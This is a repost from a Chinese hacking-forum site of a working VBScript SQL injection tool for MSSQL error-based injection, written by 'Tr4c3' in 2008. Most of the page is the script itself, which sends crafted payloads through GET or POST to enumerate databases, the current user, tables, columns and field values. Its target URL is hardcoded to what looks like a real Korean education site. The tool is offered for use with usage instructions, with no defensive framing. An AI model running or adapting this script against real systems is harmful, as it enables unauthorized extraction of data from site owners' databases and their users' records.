| 网站首页 | 资讯 | Hack | 漏洞 | 网管 | 编程 | 培训 | 品黑页 | 软件 | 论坛 | 动画 | 视频 | 经典 | 教学站 | 黑客点睛 | 
服务导航 我要发布 主力频道 空间域名 精华收集 服务器出租 黑客培训 光盘刻录 特色服务 解决方案 我要投诉
您现在的位置: 华夏黑客同盟 >> Hack >> 脚本漏洞攻击 >> 正文 用户登录 新用户注册
Sql2005注射辅助脚本         ★★★ 【字体:
Sql2005注射辅助脚本[粗糙版]
作者:Tr4c3 文章来源:鬼仔的博客 点击数: 更新时间:2008-4-20

 

 

 

 

 

 

 

 

 

 

 

 

 

'***********************************************************************************************
'Sql2005注射辅助脚本[粗糙版] 用于mssql显错模式 By Tr4c3[at]126[Dot]com
'亦适用于MSSQL 2000的注射,不过2000还是用nbsi和Pangolin。
'***********************************************************************************************
'为了保持脚本的通用性,放弃了 and (select col_name(object_id('TableName'),N))=0这样的用法。
'欲返回韩文等字符可修改121或者136行,更多的设置要自己修改
'更多功能请大家自己加入

Const method = "Get" '提交方式请修改此处,有get和post可选
Const DisPlay = "D" 'S 保存到文件,D输出到屏幕

Dim strUrl_B, strUrl, i, k, MyArray, strArg, strD

strUrl_B = "http://onedu.mk.co.kr/02_process/cata1_2.asp?kwajung_code=120'" '基于注射点的不确定性,此处请手工更改
i = 1 '库的基数
k = 0 '表和字段的基数
MyArray = Split(strUrl_B, "?", -1, 1)
strUrl = MyArray(0) '取url
strArg = MyArray(1) '取参数
Set Args = Wscript.Arguments

If Args.Count = 0 Then
 ShowU
End If
'If Args.Count =1 And LCase(Args(0))

'************************************************************************
' 爆库
'************************************************************************
If Args.Count =1 Then
 If LCase(Trim(Args(0)))="databases" Then
 ResuT("---------------===============================--------------")
 ResuT("All The DataBases:")

 Do
 strData = " and quotename(db_name("&i&"))=0--"
 sqlInj(strData)
 i = i + 1
 Loop Until StrD=""
 ResuT("---------------===============================--------------")
 Wscript.Quit
 ElseIf LCase(Trim(Args(0)))= "info" then
 ResuT("---------------===============================--------------")
 ResuT("The Current Database is:")
 strData = " and quotename(db_name())=0--"
 sqlInj(strData)
 ResuT("---------------===============================--------------")
 ResuT("The database User is:")
 strData = " and quotename(user)=0--"
 sqlInj(strData)
 ResuT("---------------===============================--------------")
 ResuT("The System_user is:")
 strData = " and quotename(System_user)=0--"
 sqlInj(strData)
 ResuT("---------------===============================--------------")
 Wscript.Quit
 End If
End If
'************************************************************************
' 爆表
'************************************************************************
If Args.Count=2 And LCase(Trim(Args(1)))="tables" Then
 ResuT("---------------===============================--------------")
 ResuT("The Tables Of " & Args(0))
 Do
 strData = " and (select top 1 quotename(name) from "& Args(0) & ".dbo.sysobjects where xtype=char(85) AND name not in (select top "& k &" name from "&Args(0)&".dbo.sysobjects where xtype=char(85)))=0--"
 sqlInj(strData)
 k = k + 1
 Loop Until StrD=""
 ResuT("---------------===============================--------------")
 Wscript.Quit
End If

'************************************************************************
' 爆字段
'************************************************************************
If Args.Count=3 And LCase(Trim(Args(2)))="cols" Then
 Database = Args(0)
 Table = Args(1)
 TarGet = DataBase & ".dbo." & Table
 TarGetCol = Database & ".DBO.SYSCOLUMNS"
 ResuT("---------------===============================--------------")
 ResuT("The Columns Of " & TarGet)
 Do
 strData = " and (select top 1 Quotename(name) from "& TarGetCol &" where id=object_id('"& TarGet &"') and name not in (select top "&k&" name from "& TarGetCol &" where id=object_id('"& TarGet &"')))=0--"
 sqlInj(strData)
 k = k + 1
 Loop Until StrD=""
 ResuT("---------------===============================--------------")
 Wscript.Quit
End If

'************************************************************************
' 爆字段值
'************************************************************************
If Args.Count=4 And LCase(Trim(Args(3)))="values" Then
 Database = Args(0)
 Table = Args(1)
 col = Args(2)
 Target = Database & ".dbo." & Table
 ResuT("---------------===============================--------------")
 ResuT("The Values Of " & Args(2) & " in "&Target)
 Do
 strData = " and (select top 1 quotename("& col &") from "& Target & " where "& col &" not in (select top "& k &" "& col &" from "& Target &"))=0--"
 sqlInj(strData)
 k = k + 1
 Loop Until StrD=""
 ResuT("---------------===============================--------------")
 Wscript.Quit
End If

Sub SqlInj(value)
 If UCase(method) = "GET" Then
 value = strArg & value
 Set objXML = CreateObject("Microsoft.XMLHTTP")
 objXML.Open "GET", strUrl &"?" & value , False
 objXML.SetRequestHeader "Referer", strUrl
 'objXML.SetRequestHeader "Accept-Language", "EUC-KR"
 objXML.send()
 strRevS = objXML.ResponseText '默认用这个
 'strRevS = bytes2BSTR(objXML.ResponseBody) '韩文有时候要用这个
 If InStr(strRevS,"'[")<>0 And InStr(strRevs,"]'")<>0 Then
 strD = Mid(strRevS,InStr(strRevS,"'[")+2, InStr(strRevs,"]'") - Instr(strRevS,"'[")-2)
 ResuT(" |_"&strD)
 Else
 strD = ""
 End If
 ElseIf UCase(method) = "POST" Then
 value = strArg & value
 Set objXML = CreateObject("Microsoft.XMLHTTP")
 objXML.Open "POST", strUrl, False
 objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
 objXML.SetRequestHeader "Referer", strUrl
 objXML.send(UrlEncode(value))
 strRevS = objXML.ResponseText '默认用这个
 'strRevS = bytes2BSTR(objXML.ResponseBody) '韩文有时候要用这个
 If InStr(strRevS,"'[")<>0 And InStr(strRevs,"]'")<>0 Then
 strD = Mid(strRevS,InStr(strRevS,"'[")+2, InStr(strRevs,"]'") - Instr(strRevS,"'[")-2)
 ResuT(" |_"&strD)
 Else
 strD = ""
 End If
 End If
End Sub

Function ResuT(strInfo)
 If UCase(DisPlay) = "S" Then
 Set fso = CreateObject("Scripting.FileSystemObject")
 Set fso1 = fso.OpenTextFile("result.txt",8,True)
 fso1.WriteLine(strInfo)
 fso1.Close
 Set fso = Nothing
 ElseIf UCase(DisPlay) = "D" Then
 Wscript.Echo(strInfo)
 End If
End Function

Function UrlEncode(str)
 str = Replace(str," ","+")
 UrlEncode = str
End Function

Function bytes2BSTR(vIn)
 strReturn = ""
 For i = 1 To LenB(vIn)
 ThisCharCode = AscB(MidB(vIn,i,1))
 If ThisCharCode < &H80 Then
 strReturn = strReturn & Chr(ThisCharCode)
 Else
 NextCharCode = AscB(MidB(vIn,i+1,1))
 strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
 i = i + 1
 End If
 Next
 bytes2BSTR = strReturn
End Function

Sub showU()
 With Wscript
 .Echo("+--------------------------=====================------------------------------+")
 .Echo("Sql2005注射辅助脚本(粗糙版),用于mssql显错模式 By Tr4c3[at]126[Dot]com")
 .Echo("Usage:")
 .Echo(" cscript"&.ScriptName&" info--爆基本信息")
 .Echo(" cscript"&.ScriptName&" databases--爆所有库名")
 .Echo(" cscript"&.ScriptName&" pubs tables--爆库pubs里所有用户表名")
 .Echo(" cscript"&.ScriptName&" pubs authors cols--爆库pubs里authors表的所有字段名")
 .Echo(" cscript"&.ScriptName&" pubs authors au_id values--爆pubs.dbo.authors里au_id的值")
 .Echo("+--------------------------=====================------------------------------+")
 .Quit
 End with
End Sub

 
责任编辑:朱倩  联系方式  Email:朱倩
电话:51228163
  • 上一篇黑客:

  • 下一篇黑客:
    • (只显示最新5条。评论内容只代表网友观点,与本站立场无关!)
    姓 名:
    		 * 游客填写  ·注册用户
    主 页:
    评 分:
    		 1分 2分 3分 4分 5分
    评论内容:
    验证码: *
  • 请遵守《互联网电子公告服务管理规定》及中华人民共和国其他各项有关法律法规。
  • 严禁发表危害国家安全、损害国家利益、破坏民族团结、破坏国家宗教政策、破坏社会稳定、侮辱、诽谤、教唆、淫秽等内容的评论 。
  • 用户需对自己在使用本站服务过程中的行为承担法律责任(直接或间接导致的)。
  • 本站管理员有权保留或删除评论内容。
  • 评论内容只代表网友个人观点,与本网站立场无关。
    • 最新hack更新
    最新推荐资讯
    相关黑客
    SQL注入原理深度解析
    脚本攻击防范策略完全篇
    脚本注入如何绕过限制
    跨站式SQL注入的技巧
    加密术和SQL注入攻击
    突破SQL脚本注入想法
    图灵脚本的解密开始
    Dreamweaver挖掘漏洞
    Shell脚本初学者的入门
    Sql脚本注射技巧整理
    最新会员软件
    最新推荐视频
    最新推荐动画

    Copyright @ 2005 77169.Net Inc. All rights reserved. 华夏黑客同盟 版权所有
    北京市电信通提供网络带宽

    mailto:webmaster@77169.net
    咨询QQ号:836982 / 59280880
    联系站长 QQ38588913
    热线电话: 86-10-67634029/676229433
    京ICP证041431号